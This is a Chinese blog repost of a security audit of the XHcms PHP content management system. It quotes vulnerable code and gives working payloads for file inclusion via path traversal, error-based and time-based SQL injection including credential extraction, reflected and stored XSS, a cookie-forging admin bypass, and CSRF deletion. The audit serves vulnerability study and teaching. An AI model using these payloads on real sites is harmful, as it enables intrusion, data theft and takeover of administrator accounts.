某cms代码审计

字数统计: 1.9k字   |   阅读时长≈ 9分

暂无简介

XHcms

目录结构

admin --管理后台文件夹
css   --存放css的文件夹
files --存放页面的文件夹
images--存放图片的文件夹
inc   --存放网站配置文件的文件夹
install   --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template  --模板文件夹
upload--上传功能文件夹
index.php --网站首页

文件包含漏洞

index.php

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file = addslashes($_GET['r']); //接收文件名
$action = $file == '' ? 'index' : $file; //判断为空或者等于index
include('files/' . $action . '.php'); //载入相应文件

GET传值r,用函数addslashes转义我们传入的值,防止命令执行、sql注入等,但是这里对文件包含并没有影响

存在目录穿越,可以包含file目录中的也可以包含根目录中的文件

我们在files文件夹下新建一个2.php 根目录新建1.php

<?php phpinfo();

payload:
?r=2 //包含files文件夹下的phpinfo()
?r=../1  //包含根目录的phpinfo()

第二处adminindex.php也是存在同样问题

SQL注入漏洞

admin/login.php

<?php
ob_start();
require '../inc/conn.php';
$login = $_POST['login'];
$user = $_POST['user'];
$password = $_POST['password'];
$checkbox = $_POST['checkbox'];
if ($login <> "") {
$query = "SELECT * FROM manage WHERE user='$user'";
echo $query;
$result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$users = mysql_fetch_array($result);
if (!mysql_num_rows($result)) {
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
} else {
$passwords = $users['password'];
if (md5($password) <> $passwords) {
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}
//写入登录信息并记住30天
if ($checkbox == 1) {
setcookie('user', $user, time() + 3600 * 24 * 30, '/');
} else {
setcookie('user', $user, 0, '/');
}
echo "<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>

没有对参数进行过滤

SQLmap一把梭

手注:

  • 报错注入
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ //yong
' and updatexml(1,concat(0x7e,(select group_concat() from information_schema.tables where table_schema='www_xh_com' limit 0,1),0x7e),1)--+ //表名
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit 0,1),0x7e),1)--+
' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
  • 时间盲注
' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

admin/softlist.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen = 'class="open"';
$pageyema = "?r=wzlist&page=";
$delete = $_GET['delete'];
if ($delete <> "") {
$query = "DELETE FROM download WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
echo "<script>alert('亲,ID为" . $delete . "的内容已经成功删除!');location.href='?r=softlist'</script>";
exit;
}
?>

无过滤,开启了mysql错误回显,直接报错注入

http://www.xh.com/admin/?r=softlist&delete=' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

执行结果:

SQL语句有误:XPATH syntax error: '~xh@localhost~'

admin/editlink.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$linklistopen = 'class="open"';
$id = $_GET['id'];
$query = "SELECT * FROM link WHERE id='$id'";
echo $query;
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$link = mysql_fetch_array($resul);

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editcolumn.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnopen = 'class="open"';
$id = $_GET['id'];
$type = $_GET['type'];
if ($type == 1) {
$query = "SELECT * FROM nav WHERE id='$id'";
echo $query;
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$nav = mysql_fetch_array($resul);
}
if ($type == 2) {
$query = "SELECT * FROM navclass WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$nav = mysql_fetch_array($resul);
}

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editsoft.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen='class="open"';
$id=$_GET['id'];
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$download = mysql_fetch_array($resul);

无过滤,报错注入,时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/columnlist.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnlistopen = 'class="open"';
$delete = $_GET['delete'];
$delete2 = $_GET['delete2'];
if ($delete <> "") {
$query = "DELETE FROM nav WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
echo "<script>alert('亲,ID为" . $delete . "的栏目已经成功删除!');location.href='?r=columnlist'</script>";
exit;
}
if ($delete2 <> "") {
$query = "DELETE FROM navclass WHERE id='$delete2'";
$result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
echo "<script>alert('亲,ID为" . $delete2 . "的二级栏目已经成功删除!');location.href='?r=columnlist'</script>";
exit;
}
?>

无过滤,开启mysql错误显示,时间盲注,报错注入,布尔盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB
' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

这样类似的漏洞还有很多,毕竟这个cms很老了,而且还是一个人开发的

前台

file/software.php

<?php
require 'inc/conn.php';
require 'inc/time.class.php';
$query = "SELECT * FROM settings";
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$info = mysql_fetch_array($resul);
$id = addslashes($_GET['cid']);
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
$download = mysql_fetch_array($resul);
//浏览计数
$query = "UPDATE download SET hit = hit+1 WHERE id=$id";
echo $query;
@mysql_query($query) or die('修改错误:' . mysql_error());
?>

直接将值带入到sql语句中,就不需要闭合,也就不会触发addslashes函数

XSS漏洞

反射性

file/contact.php

$page = addslashes($_GET['page']);
if ($page <> "") {
if ($page <> 1) {
$pages = "第" . $page . "页 - ";
}
}
<?php echo $page ?>

addslashes函数对js标签并不过滤

http://www.xh.com/?r=contact&page=<script>alert(1)</script>
http://www.xh.com/?r=contact&page=<img src=1 onerror=alert(/xss/)>

存储型

admin/file/mangeinfo.php

$save=$_POST['save'];
$user=$_POST['user'];
$name=$_POST['name'];
$password=$_POST['password'];
$password2=$_POST['password2'];
$img=$_POST['img'];
$mail=$_POST['mail'];
$qq=$_POST['qq'];
if ($save==1){
if ($user==""){
echo "<script>alert('抱歉,帐号不能为空。');history.back()</script>";
exit;
}
if ($name==""){
echo "<script>alert('抱歉,名称不能为空。');history.back()</script>";
exit;
}
if ($password<>$password2){
echo "<script>alert('抱歉,两次密码输入不一致!');history.back()</script>";
exit;
}
//处理图片上传
if(!empty($_FILES['images']['tmp_name'])){
$query = "SELECT * FROM imageset";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$imageset = mysql_fetch_array($result);
include '../inc/up.class.php';
if (empty($HTTP_POST_FILES['images']['tmp_name']))//判断接收数据是否为空
{
$tmp = new FileUpload_Single;
$upload="../upload/touxiang";//图片上传的目录,这里是当前目录下的upload目录,可自已修改
$tmp -> accessPath =$upload;
if ( $tmp -> TODO() )
{
$filename=$tmp -> newFileName;//生成的文件名
$filename=$upload.'/'.$filename;
$imgsms="及图片";
}   
}
}
if ($filename<>""){
$images="img='$filename',"; 
}
if ($password<>""){
$password=md5($password);
$password="password='$password',";
}
$query = "UPDATE manage SET 
user='$user',
name='$name',
$password
$images
mail='$mail',
qq='$qq',
date=now()";
@mysql_query($query) or die('修改错误:'.mysql_error());
echo "<script>alert('亲爱的,资料".$imgsms."设置已成功更新!');location.href='?r=manageinfo'</script>"; 
exit;
}
?>

POST传参,但是无任何过滤,直接根数据库进行交互,存在存储型XSS

payload:

<img src=1 onerror=alert(/xss/)>

垂直越权

inc/checklogin.php

<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;   
}
?>

POST /admin/?r=login HTTP/1.1
Host: www.xh.com
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xh.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xh.com/admin/?r=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=moiv7ip0kf500du1luv2ccr333; name=dasd; mail=dasd;user=admin
Connection: close
user=&password=&login=yes

在cookie中添加一个新的属性:user=admin

CSRF漏洞

/admin/files/wzlist.php

$delete=$_GET['delete'];
if ($delete<>""){
$query = "DELETE FROM content WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
echo "<script>alert('亲,ID为".$delete."的内容已经成功删除!');location.href='?r=wzlist'</script>";
exit;

在内容管理→文章列表删除文章,点击删除抓包,得到url:

www.xh.com/admin/?r=wzlist&delete=18

抓包,在cookie处,添加一个新的属性:user=admin,更改delete的值就可以实现csrf


  • 本文作者: j1am
  • 本文来源: 先知社区
  • 原文链接: https://xz.aliyun.com/t/11574
  • 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。